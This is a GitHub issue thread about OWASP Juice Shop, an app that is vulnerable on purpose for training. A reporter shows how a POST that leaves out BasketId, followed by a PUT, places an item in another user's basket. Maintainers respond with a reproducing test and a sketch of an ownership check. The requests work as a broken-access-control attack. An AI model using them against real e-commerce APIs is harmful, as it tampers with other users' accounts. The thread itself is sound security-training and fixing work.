
[🐛] Alternative solution for "Manipulate Basket" #1452

Closed
vernjan opened this issue Aug 27, 2020 · 6 comments

@vernjan

vernjan commented Aug 27, 2020

🐛 Bug report

Description

There's an alternative solution for the "Manipulate Basket" challenge. This solution is, however, not recognized by the Juice Shop.
So, I think this solution should be either recognized as the correct one, or it should not be allowed.

🔬 Minimal Reproduction

1) Create new basket item

POST /api/BasketItems/
Content-type: application/json

{"quantity":3,"ProductId":19}
---
{"status":"success","data":{"id":21,"ProductId":19,"quantity":3,"updatedAt":"2020-08-26T22:22:36.821Z","createdAt":"2020-08-26T22:22:36.821Z"}}

The trick here is to delete the basketId property! A new basket item is created with a null basketId.
Just to confirm it:

GET /api/BasketItems/21
---
{"status":"success","data":{"id":21,"quantity":3,"createdAt":"2020-08-26T22:22:36.821Z","updatedAt":"2020-08-26T22:22:36.821Z","BasketId":null,"ProductId":19}}

2) Add basket item to basket
Now we can put the basket item into another user's basket (this wouldn't be possible if the basket item had already been in someone's basket):

PUT /api/BasketItems/21
Content-type: application/json

{"BasketId":"8"}
---
{"status":"success","data":{"id":21,"quantity":3,"createdAt":"2020-08-26T22:22:36.821Z","updatedAt":"2020-08-26T22:23:45.932Z","BasketId":"8","ProductId":19}}

🌳 Your Environment

Docker image, Juice Shop version v11.1.3

@vernjan vernjan added the bug label Aug 27, 2020
@github-actions

Thanks a lot for opening your first issue with us! 🧡 We'll get back to you shortly! ⏳ If it was a Support Request, please consider asking on the community chat next time! 💬

@bkimminich
Member

Good catch, currently the challenge is only checked on POST requests. I'll check if adding the same logic to the PUT path will fix this without breaking anything else.
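The check discussed above, as an added example that is not Juice Shop's own code: one "does this request place a basket item into a basket the caller does not own?" decision applied to both the POST and the PUT path, so that the null-BasketId item from the report is caught on the PUT as well. Function and field names are assumed; the sample store state is constructed from the report's responses.

```javascript
// Constructed store state after step 1 of the report: item 21 has no BasketId yet,
// item 22 already sits in basket 5.
const basketItems = new Map([
  [21, { id: 21, ProductId: 19, quantity: 3, BasketId: null }],
  [22, { id: 22, ProductId: 19, quantity: 1, BasketId: 5 }],
]);

// userBasketId comes from the authenticated session, never from the request body.
// Returns { allow, manipulationAttempt, reason }; manipulationAttempt is what the
// challenge tracker would record, allow is what the API would enforce.
function inspectBasketItemRequest(method, itemId, body, userBasketId) {
  // Accept "8" and 8 alike; undefined means the field was omitted (or sent as null).
  const bodyBasketId = body.BasketId === undefined || body.BasketId === null
    ? undefined : Number(body.BasketId);
  const targetsForeignBasket = bodyBasketId !== undefined && bodyBasketId !== userBasketId;

  if (method === 'POST') {
    if (bodyBasketId === undefined) {
      // An item without an owner can later be re-parented, so refuse to create one.
      return { allow: false, manipulationAttempt: false, reason: 'BasketId required' };
    }
    return targetsForeignBasket
      ? { allow: false, manipulationAttempt: true, reason: "BasketId is not the caller's basket" }
      : { allow: true, manipulationAttempt: false, reason: 'ok' };
  }

  if (method === 'PUT') {
    const item = basketItems.get(itemId);
    if (!item) return { allow: false, manipulationAttempt: false, reason: 'item not found' };
    // Ownership is decided on the stored item; BasketId null belongs to nobody.
    if (item.BasketId !== userBasketId) {
      return { allow: false, manipulationAttempt: true, reason: "item is not in the caller's basket" };
    }
    // Same rule as on POST: moving the item into another basket is flagged and refused.
    return targetsForeignBasket
      ? { allow: false, manipulationAttempt: true, reason: "BasketId is not the caller's basket" }
      : { allow: true, manipulationAttempt: false, reason: 'ok' };
  }

  return { allow: false, manipulationAttempt: false, reason: 'unsupported method' };
}
```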

@bkimminich
Member

bkimminich commented Aug 27, 2020

Hmm, that PUT you're doing shouldn't even work... I just wrote a test reproducing your steps, but it kept getting 500 errors on that PUT. This is how the test passes:

  it('PUT update basket ID of basket item without basket ID is forbidden', () => {
    return frisby.post(API_URL + '/BasketItems', {
      headers: authHeader,
      body: {
        ProductId: 8,
        quantity: 8
      }
    })
      .expect('status', 200)
      .then(({ json }) => {
        expect(json.data.BasketId).toBeUndefined()
        return frisby.put(API_URL + '/BasketItems/' + json.data.id, {
          headers: authHeader,
          body: {
            BasketId: 42
          }
        })
          .expect('status', 500)
          .expect('json', { message: 'internal error', errors: ['SQLITE_CONSTRAINT: FOREIGN KEY constraint failed'] })
      })
  })

Any idea what might be different? I also tried passing the ID as a String, but that doesn't change the outcome.

@vernjan
Author

vernjan commented Aug 27, 2020

Hi, maybe one of

  1. Does basket with ID 42 exist?
  2. I remember I was getting some errors if quantity > 5
  3. I used basket ID as String, not Integer (not sure if it matters though)
  4. EDIT: Missing Content-type header?

@bkimminich
Member

It was 1.) ... 🤦‍♂️

@github-actions

This thread has been automatically locked because it has not had recent activity after it was closed. 🔒 Please open a new issue for regressions or related bugs.

@github-actions github-actions bot locked and limited conversation to collaborators Aug 28, 2021